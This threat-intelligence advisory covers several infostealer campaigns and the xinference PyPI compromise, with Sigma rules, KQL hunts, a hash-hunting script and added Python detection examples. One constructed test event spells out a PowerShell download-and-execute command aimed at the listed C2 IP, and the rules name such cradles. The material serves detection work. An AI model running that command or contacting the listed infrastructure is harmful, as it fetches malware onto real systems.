GlassWorm, Lumma Stealer, and Xinference Compromise: Multi-Front Infostealer Assessment

Security Arsenal Team
April 29, 2026
6 min read

Threat Summary

Recent OTX pulse data indicates a convergence of sophisticated supply chain attacks and social engineering campaigns aimed at harvesting credentials from enterprise environments, developers, and financial sectors. The threat landscape is dominated by the GlassWorm malware targeting developers via blockchain-based C2, the Lumma Stealer distributed via ClickFix phishing, and a new Android banking trojan (KYCShadow) exploiting fake KYC workflows. Additionally, threat actors are leveraging the hype around AI agents and frameworks (GachiLoader, Xinference compromise) to distribute infostealers like Rhadamanthys. The collective objective of these campaigns is the exfiltration of cryptocurrency wallets, cloud infrastructure keys, and banking OTPs.

Threat Actor / Malware Profile

GlassWorm

  • Distribution: Compromised code repositories and package managers.
  • Payload Behavior: Multi-stage infection fingerprinting the machine; fetches payloads via the Solana blockchain. Installs a fake browser extension for surveillance and a Remote Access Trojan (RAT).
  • C2 Communication: Solana blockchain transactions for payload fetching (novel C2 method).
  • Objective: Stealing cryptocurrency wallets and development credentials.

HijackLoader & Lumma Stealer (S1213)

  • Distribution: ClickFix-style phishing sites tricking users into running PowerShell commands.
  • Payload Behavior: Downloads an obfuscated MSI; employs DLL sideloading with renamed legitimate binaries.
  • Technique: PowerShell obfuscation, DLL sideloading.
  • Objective: Information stealing, credential theft.

KYCShadow

  • Distribution: WhatsApp messages masquerading as bank KYC verification apps.
  • Payload Behavior: Multi-stage dropper establishing persistence; uses Firebase for remote execution and WebView-based phishing.
  • C2 Communication: Firebase.
  • Objective: Credential theft, SMS interception (OTP theft), VPN manipulation to bypass banking security.

GachiLoader & Rhadamanthys

  • Distribution: Fake AI agent skills (OpenClaw) hosted on GitHub.
  • Payload Behavior: Pure social engineering; the "skills" contain no code but lure users into downloading Windows binaries. Uses Node.js single-executable application (SEA) and Electron droppers.
  • Objective: Delivering Rhadamanthys infostealer.

PyPI Supply Chain (Xinference)

  • Distribution: Compromised maintainer credentials on PyPI for the xinference library (versions 2.6.0, 2.6.1, 2.6.2).
  • Payload Behavior: Base64-encoded malicious code in __init__.py executes on import.
  • Objective: Cloud credential theft.
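An added example (not Security Arsenal's code and not the xinference project's code) of how a defender can look for the import-time pattern described above: it parses each package `__init__.py` with the `ast` module and flags `exec()`/`eval()` calls fed by a base64-family decode, and it checks an installed xinference against the three affected versions. The sample sources are constructed and their "payload" is a harmless `print`.

```python
"""Added example: detect base64-decode-then-exec in package __init__.py files and
check whether an installed xinference is in the affected version range."""
import ast
import base64
from importlib import metadata
from pathlib import Path
from typing import Dict, List, Optional

AFFECTED_XINFERENCE = {"2.6.0", "2.6.1", "2.6.2"}   # versions named in the advisory
DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode", "b85decode"}


def _call_name(func: ast.AST) -> str:
    """Dotted callee name: base64.b64decode(...) -> 'base64.b64decode', exec(...) -> 'exec'."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def _is_decode_call(node: ast.AST) -> bool:
    # Matches base64.b64decode(...) and __import__('base64').b64decode(...) alike;
    # an aliased import (from base64 import b64decode as x) is not followed.
    return isinstance(node, ast.Call) and _call_name(node.func).rsplit(".", 1)[-1] in DECODERS


def find_encoded_exec(source: str) -> List[int]:
    """Line numbers of exec()/eval() calls fed, directly or through a name assigned
    from one, by a base64-family decode call."""
    tree = ast.parse(source)
    decoded_names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and _is_decode_call(node.value):
            decoded_names.update(t.id for t in node.targets if isinstance(t, ast.Name))
    hits = set()
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and _call_name(node.func) in {"exec", "eval"}):
            continue
        for sub in ast.walk(node):
            if sub is node:
                continue
            if _is_decode_call(sub) or (isinstance(sub, ast.Name) and sub.id in decoded_names):
                hits.add(node.lineno)
                break
    return sorted(hits)


def scan_site_packages(site_packages: Path) -> Dict[str, List[int]]:
    """Scan every top-level package __init__.py under a site-packages directory."""
    findings: Dict[str, List[int]] = {}
    for init in site_packages.glob("*/__init__.py"):
        try:
            hits = find_encoded_exec(init.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            continue
        if hits:
            findings[init.parent.name] = hits
    return findings


def is_affected_version(version: Optional[str]) -> bool:
    return version in AFFECTED_XINFERENCE


def installed_xinference_version() -> Optional[str]:
    try:
        return metadata.version("xinference")
    except metadata.PackageNotFoundError:
        return None


# Constructed samples; the "payload" is a harmless print, not real malware.
_BLOB = base64.b64encode(b"print('hello')")
SAMPLE_STAGED = "import base64\n_p = base64.b64decode(%r)\nexec(_p)\n" % _BLOB
SAMPLE_INLINE = "exec(__import__('base64').b64decode(%r))\n" % _BLOB
SAMPLE_BENIGN = "import base64\nICON = base64.b64decode(%r)\n" % _BLOB

if __name__ == "__main__":
    for label, src in (("staged", SAMPLE_STAGED), ("inline", SAMPLE_INLINE), ("benign", SAMPLE_BENIGN)):
        print(f"{label}: exec-of-decoded at lines {find_encoded_exec(src)}")
    ver = installed_xinference_version()
    print(f"installed xinference: {ver}, affected: {is_affected_version(ver)}")
```

Run `scan_site_packages(Path(site.getsitepackages()[0]))` against a real interpreter to sweep every installed top-level package; a match is a reason to quarantine the environment, not proof of compromise on its own, since a handful of legitimate packages embed encoded resources.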

IOC Analysis

The provided indicators span multiple vectors critical for SOC operations:

  • Network Infrastructure: IP 85.11.161.198 and domains serv.[biz|xyz|api] represent active C2 infrastructure for Lumma Stealer and KYCShadow. These should be blocked immediately at the perimeter and proxy level.
  • File Hashes: A significant volume of SHA256 and MD5 hashes are provided for the malicious MSI payloads, Android APKs, and compromised PyPI packages. These can be loaded into EDR solutions for immediate quarantine.
  • Operationalizing IOCs: SOC teams should prioritize the network IOCs in firewall/NGFW blocks. File hashes should be used to scan historical data (last 30 days) in VDI and developer workstation environments to detect dormant infections.

Detection Engineering

Sigma Rules

YAML
---
title: Potential GlassWorm or PyPI Supply Chain Compromise
description: Detects suspicious Python processes loading encoded content or making network connections to non-standard endpoints immediately after install, characteristic of GlassWorm or Xinference compromises.
status: experimental
date: 2026/04/30
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_python:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
    CommandLine|contains: 'import'
  selection_suspicious:
    CommandLine|contains:
      - 'base64'
      - '-enc'
      - 'Solana'
  condition: selection_python and selection_suspicious
falsepositives:
  - Legitimate developer scripts encoding data
level: high
tags:
  - attack.execution
  - attack.t1059.001
---
title: ClickFix Phishing Lumma Stealer Execution
description: Detects the execution pattern associated with the HijackLoader/Lumma Stealer campaign involving PowerShell downloading MSI files from remote servers.
status: experimental
date: 2026/04/30
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_powershell:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'IEX'
      - 'Invoke-Expression'
  selection_msi:
    CommandLine|contains: '.msi'
  selection_c2:
    CommandLine|contains:
      - '85.11.161.198'
      - ':9658'
      - ':6600'
  # selection_c2 must appear in the condition, otherwise the C2 indicators never fire
  condition: selection_powershell and (selection_msi or selection_c2)
falsepositives:
  - Administrative scripts that download MSI installers with PowerShell (rare)
level: critical
tags:
  - attack.initial_access
  - attack.t1566.001
---
title: GachiLoader AI Skill Lure Execution
description: Detects Node.js or Electron processes spawning suspicious child processes like cmd or powershell, indicative of the GachiLoader campaign using fake AI skills.
status: experimental
date: 2026/04/30
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\node.exe'
      - '\electron.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\msiexec.exe'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate software installation via Node.js
level: high
tags:
  - attack.execution
  - attack.t1204
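To see how these three rules behave on real events before deploying them, the following added example (not Security Arsenal's code) evaluates their selection and condition logic over constructed Sysmon-style process-creation events. It implements only the modifiers the rules use (`|endswith` and `|contains`, case-insensitive, with a list meaning OR) and evaluates the condition string as a boolean expression over selection names; the ClickFix rule is evaluated with its `selection_c2` indicators OR'd with the MSI clause so the listed IP and ports contribute to the match.

```python
"""Added example: a minimal evaluator for the Sigma rules' detection logic, run
over constructed Windows process-creation events."""
from typing import Any, Dict, List

Event = Dict[str, str]
Rule = Dict[str, Any]


def _field_matches(value: str, modifier: str, patterns: Any) -> bool:
    """A field clause matches if ANY listed pattern matches (Sigma list semantics)."""
    if not isinstance(patterns, list):
        patterns = [patterns]
    v = value.lower()
    for p in (str(p).lower() for p in patterns):
        if modifier == "endswith" and v.endswith(p):
            return True
        if modifier == "contains" and p in v:
            return True
    return False


def selection_matches(event: Event, selection: Dict[str, Any]) -> bool:
    """Every field clause inside one selection must match (AND)."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if not _field_matches(event.get(field, ""), modifier, patterns):
            return False
    return True


def rule_matches(event: Event, rule: Rule) -> bool:
    """Evaluate a condition such as 'a and (b or c)' with each selection name bound
    to its result. The condition text is trusted rule content, not user input."""
    bindings = {name: selection_matches(event, sel) for name, sel in rule["selections"].items()}
    return bool(eval(rule["condition"], {"__builtins__": {}}, bindings))


# The three rules above, reduced to their detection sections.
RULES: Dict[str, Rule] = {
    "python_encoded_content": {
        "selections": {
            "selection_python": {"Image|endswith": ["\\python.exe", "\\python3.exe"],
                                 "CommandLine|contains": "import"},
            "selection_suspicious": {"CommandLine|contains": ["base64", "-enc", "Solana"]},
        },
        "condition": "selection_python and selection_suspicious",
    },
    "clickfix_lumma": {
        "selections": {
            "selection_powershell": {"Image|endswith": "\\powershell.exe",
                                     "CommandLine|contains": ["DownloadString", "IEX", "Invoke-Expression"]},
            "selection_msi": {"CommandLine|contains": ".msi"},
            "selection_c2": {"CommandLine|contains": ["85.11.161.198", ":9658", ":6600"]},
        },
        "condition": "selection_powershell and (selection_msi or selection_c2)",
    },
    "gachiloader_child": {
        "selections": {
            "selection_parent": {"ParentImage|endswith": ["\\node.exe", "\\electron.exe"]},
            "selection_child": {"Image|endswith": ["\\cmd.exe", "\\powershell.exe", "\\msiexec.exe"]},
        },
        "condition": "selection_parent and selection_child",
    },
}

# Constructed sample events (Sysmon event ID 1 field names); index 1 and 3 are benign.
EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://85.11.161.198:9658/update.msi')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -File C:\\ops\\rotate-logs.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": "cmd /c start installer.exe"},
    {"Image": r"C:\Program Files\Git\cmd\git.exe", "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": "git status"},
    {"Image": r"C:\Python312\python.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "python.exe -c \"import base64,xinference\""},
]


def evaluate(events: List[Event], rules: Dict[str, Rule] = RULES) -> Dict[str, List[int]]:
    """Map each rule name to the indices of the events it fires on."""
    return {name: [i for i, ev in enumerate(events) if rule_matches(ev, rule)]
            for name, rule in rules.items()}


if __name__ == "__main__":
    for name, hits in evaluate(EVENTS).items():
        print(f"{name}: fires on events {hits}")
```

Feeding a week of real process-creation events through `evaluate` gives a quick false-positive count per rule before the rules go into the SIEM; note that the Python rule only sees `import` when the interpreter is invoked with `-c`, so script-file invocations of a compromised package would need a different signal.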

KQL (Microsoft Sentinel)

KQL
// Hunt for C2 connections associated with KYCShadow and Lumma Stealer.
// has_any matches the domain whether or not the logged URL carries a scheme,
// path or port; an exact "in" comparison would miss those forms.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("serv.biz", "serv.xyz", "api.biz", "robinhuds.com")
    or RemoteIP == "85.11.161.198"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| summarize Count=count() by DeviceName, RemoteUrl
| order by Count desc

KQL
// Hunt for GlassWorm/Xinference suspicious Python activity.
// Match python both as the created process and as the parent of a spawned child.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName has "python" or InitiatingProcessFileName has "python"
| where ProcessCommandLine has_any ("base64", "Solana")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName

PowerShell Hunt Script

PowerShell
# IOC Hunt Script for GlassWorm, Lumma, and Xinference Hashes
# Requires Admin Privileges.
# Get-FileHash defaults to SHA256, so the MD5 indicators are kept in a separate
# list and checked with -Algorithm MD5; a single SHA256 pass would never match them.

$Sha256Hashes = @(
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728",
    "818daf975f78ac30ba4ce0fdd2f7eb550cdc16701da35594e8c9cba72bc84a5c",
    "077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c",
    "e1e007ce4eab7774785617179d1c01a9381ae83abfd431aae8dba6f82d3ac127"
)
$Md5Hashes = @(
    "3ee893ae46530b92e0d26435fb979d82", # MD5 for Xinference
    "b07a03883675654088a2b56a80933ca8"  # MD5 for Lumma
)

Write-Host "[+] Starting IOC Hunt for specific file hashes..." -ForegroundColor Cyan

$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Drive in $Drives) {
    Write-Host "[+] Scanning drive $Drive..." -ForegroundColor Yellow
    # -File skips directories (Get-FileHash cannot hash them); access errors are suppressed.
    Get-ChildItem -Path $Drive -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $Sha = Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
            if ($Sha -and $Sha256Hashes -contains $Sha.Hash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) | SHA256: $($Sha.Hash)" -ForegroundColor Red
                return   # next file
            }
            $Md5 = Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue
            if ($Md5 -and $Md5Hashes -contains $Md5.Hash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) | MD5: $($Md5.Hash)" -ForegroundColor Red
            }
        }
}

# Enumerate installed browser extensions so suspicious GlassWorm add-ons can be reviewed.
# Chrome keeps each extension's manifest.json under <profile>\Extensions\<id>\<version>\;
# Firefox lists add-ons in each profile's extensions.json. No GlassWorm extension IDs or
# keywords are listed in this advisory, so the output is for analyst review, not auto-matching.
$ChromeRoot  = "$env:LOCALAPPDATA\Google\Chrome\User Data"
$FirefoxRoot = "$env:APPDATA\Mozilla\Firefox\Profiles"
Write-Host "[+] Enumerating browser extensions for review..." -ForegroundColor Yellow

Get-ChildItem -Path "$ChromeRoot\*\Extensions\*\*\manifest.json" -ErrorAction SilentlyContinue |
    ForEach-Object {
        $Manifest = Get-Content -Path $_.FullName -Raw | ConvertFrom-Json
        $Id = $_.Directory.Parent.Name
        Write-Host "    Chrome $Id : $($Manifest.name) v$($Manifest.version) | permissions: $($Manifest.permissions -join ', ')"
    }

Get-ChildItem -Path "$FirefoxRoot\*\extensions.json" -ErrorAction SilentlyContinue |
    ForEach-Object {
        foreach ($Addon in (Get-Content -Path $_.FullName -Raw | ConvertFrom-Json).addons) {
            Write-Host "    Firefox $($Addon.id) : $($Addon.defaultLocale.name) v$($Addon.version)"
        }
    }

Write-Host "[+] Hunt complete." -ForegroundColor Cyan

Response Priorities

  • Immediate:
    • Block all IOCs listed in the IOC Analysis section at the firewall and proxy level.
    • Scan developer workstations and build servers for the xinference PyPI package versions 2.6.0, 2.6.1, and 2.6.2. Remove immediately.
    • Hunt for the execution of PowerShell commands associated with 85.11.161.198.
  • 24 Hours:
    • If compromise is suspected (especially with GlassWorm or Xinference), force rotation of all development credentials and cloud API keys (AWS, Azure, GCP) used by affected machines.
    • Investigate mobile devices (MDM) for the presence of APKs matching the KYCShadow hashes (if EDR supports mobile), or warn users about fake KYC apps.
  • 1 Week:
    • Architecture Hardening: Implement strict package version pinning with hash checking (requirements.txt hash-checking mode) for Python and Node.js environments to prevent supply chain poisoning.
    • Review and restrict the execution of unsigned binaries and macros downloaded from the internet.
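The hash-checking half of the hardening step, as an added example (not Security Arsenal's code): it parses a requirements file whose lines carry `--hash=sha256:...` entries, verifies local artifacts against the pinned digests, and rejects unpinned or hashless lines, which is what pip's `--require-hashes` mode enforces at install time. The package name `examplepkg`, its wheel and its digest are constructed in a temporary directory so the demonstration runs offline.

```python
"""Added example: verify Python artifacts against sha256 digests pinned in a
requirements file, the control that blocks a swapped package release."""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

PIN_RE = re.compile(r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>[^\s\\]+)")
HASH_RE = re.compile(r"--hash=sha256:([0-9a-fA-F]{64})")

Requirements = Dict[str, Tuple[str, List[str]]]


def parse_requirements(text: str) -> Requirements:
    """{name: (version, [sha256 hex, ...])}. Backslash continuations are joined first.
    Raises ValueError for any line that is not exactly pinned or carries no hash."""
    reqs: Requirements = {}
    for line in text.replace("\\\n", " ").splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = PIN_RE.match(line)
        if not m:
            raise ValueError(f"requirement is not pinned with ==: {line!r}")
        hashes = [h.lower() for h in HASH_RE.findall(line)]
        if not hashes:
            raise ValueError(f"no --hash=sha256 entry for {m['name']}")
        reqs[m["name"].lower()] = (m["version"], hashes)
    return reqs


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_artifact(name: str, artifact: Path, reqs: Requirements) -> bool:
    """True only if the artifact's digest is one of the digests pinned for that package."""
    _version, hashes = reqs[name.lower()]
    return sha256_of(artifact) in hashes


def demo() -> Tuple[bool, bool]:
    """Build a fake wheel, pin its digest, verify; then swap the bytes and verify again."""
    with tempfile.TemporaryDirectory() as tmp:
        wheel = Path(tmp) / "examplepkg-1.0.0-py3-none-any.whl"   # constructed, not a real package
        wheel.write_bytes(b"PK\x03\x04 constructed wheel contents")
        reqs_text = (
            "# hash-pinned requirements (constructed)\n"
            f"examplepkg==1.0.0 \\\n    --hash=sha256:{sha256_of(wheel)}\n"
        )
        reqs = parse_requirements(reqs_text)
        before = verify_artifact("examplepkg", wheel, reqs)
        # Same file name and version string, different contents: the digest no longer matches.
        wheel.write_bytes(b"PK\x03\x04 same filename, different contents")
        after = verify_artifact("examplepkg", wheel, reqs)
    return before, after


if __name__ == "__main__":
    print("verification before/after tampering:", demo())
```

The point of the second verification is that a version pin alone (`==2.6.1`) would still have accepted a re-uploaded artifact under the same version, whereas a digest pin does not; `pip install --require-hashes -r requirements.txt` applies the same rule to every dependency, including transitive ones.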
